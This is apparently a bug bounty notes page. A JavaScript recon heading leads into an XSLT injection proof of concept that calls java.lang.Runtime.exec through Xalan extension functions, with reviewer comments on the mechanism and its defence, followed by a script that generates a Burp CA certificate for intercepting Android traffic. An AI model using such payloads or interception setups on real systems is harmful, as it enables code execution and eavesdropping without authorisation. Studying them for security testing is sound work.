This is a simple guide to performing JavaScript recon in bug bounty work.
- The first step is to collect as many JavaScript files as you can (more files = more paths and parameters -> more vulns).
<!-- NOTE(review): this is a demonstration fragment, not a complete stylesheet: xsl:template has no
     match attribute and neither xsl:stylesheet nor xsl:template is closed. It only does anything when
     the XSLT engine is Xalan/XSLTC with Java extension functions enabled, where a namespace bound to a
     Java class name lets the stylesheet call that class's methods. Defence on the processing side:
     never transform stylesheets from an untrusted source, and enable
     javax.xml.XMLConstants.FEATURE_SECURE_PROCESSING on the TransformerFactory, which turns extension
     functions off. The "#nnn Methodref/Utf8/String" comments look like constant-pool entries copied
     from the compiled translet class (presumably javap output), not part of the payload itself;
     verify against the author's original. -->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
<xsl:template> | |
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; --> | |
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; --> | |
<!-- #114 Utf8: open -a calculator --> | |
<!-- #115 String: touch /tmp/pwn --> | |
<!-- Binding a namespace prefix to a Java class is the Xalan extension-function mechanism described above. -->
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/> | |
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/> | |
<!-- #132 Utf8: <init> --> | |
<!-- NOTE(review): the line below is not well-formed XML (a raw "<" inside an attribute value); it reads
     like a probe for how the parser handles the constant-pool "<init>" name rather than a working element. -->
<AAA select="<init>"/> |
My Android 12 device does not accept the default Burp certificate; you have to generate your own CA certificate, import it into Burp, and use the commands below to make it compatible with Android.
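#!/bin/sh
# Generate a private CA for Burp and produce a copy of its certificate named the
# way the Android system CA store expects (legacy OpenSSL subject hash + ".0").
# Run as a script rather than pasting into an interactive shell (it uses set -e).
#
# Outputs (all in ./cert):
#   server.key            CA private key, PEM (as written by openssl req)
#   server.key.der        CA private key, traditional DER
#   server.key.pkcs8.der  CA private key, unencrypted PKCS#8 DER (the form Burp imports)
#   ca.der / ca.pem       CA certificate, DER and PEM
#   <hash>.0              ca.pem named by -subject_hash_old for the Android store
#
# This key signs every certificate the intercepting proxy presents to the device,
# so it must not leak: abort on the first failure instead of continuing with a
# half-generated set of files, and create everything readable by this user only.
set -eu
umask 077

mkdir cert && cd cert || exit 1

# Self-signed CA certificate (DER) plus its key (PEM, unencrypted because of -nodes).
# openssl req prompts for the subject fields interactively unless -subj is given.
openssl req -x509 -days 730 -nodes -newkey rsa:2048 -outform der -keyout server.key -out ca.der -extensions v3_ca

# Key: PEM -> traditional DER.
openssl rsa -in server.key -inform pem -out server.key.der -outform der

# Key: DER -> unencrypted PKCS#8 DER.
openssl pkcs8 -topk8 -in server.key.der -inform der -out server.key.pkcs8.der -outform der -nocrypt

# Certificate: DER -> PEM.
openssl x509 -inform der -in ca.der -out ca.pem

# Android looks system CA certificates up by the legacy subject hash. With -noout
# openssl prints only the hash, so no "head -1" (and no SIGPIPE on the pipe) is needed.
cp ca.pem "$(openssl x509 -inform pem -subject_hash_old -noout -in ca.pem).0"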